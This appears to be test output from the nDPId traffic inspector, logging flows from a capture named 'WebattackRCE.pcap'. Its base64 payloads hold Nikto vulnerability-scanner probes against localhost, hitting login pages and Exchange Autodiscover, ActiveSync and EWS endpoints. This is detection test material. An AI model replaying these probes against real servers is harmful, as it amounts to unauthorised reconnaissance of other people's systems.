00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1576420276763,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1576420276763,"pkt":"AAAAAAAAAAAAAAAACABFAADSXUtAAEAG3th\/AAABfwAAAcIKH5BTRGVwA03HQYAYAED+xgAAAQEICp1m+0OdZvtCR0VUIC9qdW5rOTg4LmFzcHggSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBUcmFuc2xhdGUtZiAjMSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01070{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":66,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276763,"flow_last_seen":1576420276763,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420276763,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49674,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/junk988.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1576420276764,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":221,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":221,"pkt_l4_len":187,"thread_ts_msec":1576420276764,"pkt":"AAAAAAAAAAAAAAAACABFAADP8RNAAEAGSxN\/AAABfwAAAcIMH5D+v8k3Lccr2IAYAED+wwAAAQEICp1m+0SdZvtER0VUIC9sb2dpbi5hc3AgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IFRyYW5zbGF0ZS1mICMxKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01067{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276764,"flow_last_seen":1576420276764,"flow_idle_time":7580000,"flow_min_l4_payload_len":155,"flow_max_l4_payload_len":155,"flow_tot_l4_payload_len":155,"midstream":1,"thread_ts_msec":1576420276764,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49676,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276765,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1576420276765,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420276765,"pkt":"AAAAAAAAAAAAAAAACABFAADQIn9AAEAGGad\/AAABfwAAAcIOH5Dotxpb5DtnaoAYAED+xAAAAQEICp1m+0WdZvtFR0VUIC9sb2dpbi5hc3B4IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogVHJhbnNsYXRlLWYgIzEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276765,"flow_last_seen":1576420276765,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420276765,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49678,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/login.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:headers: Translate-f #1)"}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276768,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1576420276768,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":196,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":196,"pkt_l4_len":162,"thread_ts_msec":1576420276768,"pkt":"AAAAAAAAAAAAAAAACABFAAC2dlNAAEAGxex\/AAABfwAAAcIQH5C4PE56dk2whIAYAED+qgAAAQEICp1m+0idZvtIR0VUIC8gSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276768,"flow_last_seen":1576420276768,"flow_idle_time":7580000,"flow_min_l4_payload_len":130,"flow_max_l4_payload_len":130,"flow_tot_l4_payload_len":130,"midstream":1,"thread_ts_msec":1576420276768,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49680,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420276770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00659{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1576420276770,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420276770,"pkt":"AAAAAAAAAAAAAAAACABFAAC8XLtAAEAG335\/AAABfwAAAcISH5CeUGSSsmiGvoAYAED+sAAAAQEICp1m+0qdZvtKR0VUIC9pbWFnZXMgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":70,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276770,"flow_last_seen":1576420276770,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420276770,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49682,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420276771,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1576420276771,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1576420276771,"pkt":"AAAAAAAAAAAAAAAACABFAADTCw5AAEAGMRV\/AAABfwAAAcIUH5CyKDMlKN\/VCYAYAED+xwAAAQEICp1m+0udZvtLR0VUIC9BdXRvZGlzY292ZXIvQXV0b2Rpc2NvdmVyLnhtbCBIVFRQLzEuMA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":71,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276771,"flow_last_seen":1576420276771,"flow_idle_time":7580000,"flow_min_l4_payload_len":159,"flow_max_l4_payload_len":159,"flow_tot_l4_payload_len":159,"midstream":1,"thread_ts_msec":1576420276771,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1576420276773,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276773,"pkt":"AAAAAAAAAAAAAAAACABFAADDAPJAAEAGO0F\/AAABfwAAAcIWH5B1lTjaOiDdGIAYAED+twAAAQEICp1m+02dZvtMR0VUIC9BdXRvZGlzY292ZXIvIEhUVFAvMS4wDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6aGVhZGVyczogSUlTIGludGVybmFsIElQKQ0KDQo="}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":72,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276773,"flow_last_seen":1576420276773,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276773,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49686,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276774,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00688{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1576420276774,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":223,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":223,"pkt_l4_len":189,"thread_ts_msec":1576420276774,"pkt":"AAAAAAAAAAAAAAAACABFAADRNpRAAEAGBZF\/AAABfwAAAcIYH5C\/CA68jFESSoAYAED+xQAAAQEICp1m+06dZvtOR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276774,"flow_last_seen":1576420276774,"flow_idle_time":7580000,"flow_min_l4_payload_len":157,"flow_max_l4_payload_len":157,"flow_tot_l4_payload_len":157,"midstream":1,"thread_ts_msec":1576420276774,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49688,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00704{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1576420276776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":235,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":235,"pkt_l4_len":201,"thread_ts_msec":1576420276776,"pkt":"AAAAAAAAAAAAAAAACABFAADdUNZAAEAG60J\/AAABfwAAAcIaH5Ae8Gj\/tlcbuIAYAED+0QAAAQEICp1m+1CdZvtPR0VUIC9NaWNyb3NvZnQtU2VydmVyLUFjdGl2ZVN5bmMvZGVmYXVsdC5jc3MgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276776,"flow_last_seen":1576420276776,"flow_idle_time":7580000,"flow_min_l4_payload_len":169,"flow_max_l4_payload_len":169,"flow_tot_l4_payload_len":169,"midstream":1,"thread_ts_msec":1576420276776,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49690,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1576420276777,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276777,"pkt":"AAAAAAAAAAAAAAAACABFAAC51DJAAEAGaAp\/AAABfwAAAcIcH5BDaOwb++ns54AYAED+rQAAAQEICp1m+1GdZvtRR0VUIC9FQ1AgSFRUUC8xLjANCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQoNCg=="}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276777,"flow_last_seen":1576420276777,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276777,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49692,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276779,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1576420276779,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1576420276779,"pkt":"AAAAAAAAAAAAAAAACABFAAC5SehAAEAG8lR\/AAABfwAAAcIeH5AlzXHNG7GlzoAYAED+rQAAAQEICp1m+1OdZvtTR0VUIC9FV1MgSFRUUC8xLjANClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpoZWFkZXJzOiBJSVMgaW50ZXJuYWwgSVApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276779,"flow_last_seen":1576420276779,"flow_idle_time":7580000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"midstream":1,"thread_ts_msec":1576420276779,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49694,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_packet_id":1,"flow_last_seen":1576420276780,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276780,"pkt":"AAAAAAAAAAAAAAAACABFAADH3u5AAEAGXUB\/AAABfwAAAcIgH5D8fubIriLokYAYAED+uwAAAQEICp1m+1SdZvtUR0VUIC9FV1MvRXhjaGFuZ2UuYXNteCBIVFRQLzEuMA0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmhlYWRlcnM6IElJUyBpbnRlcm5hbCBJUCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":77,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420276780,"flow_last_seen":1576420276780,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276780,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49696,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
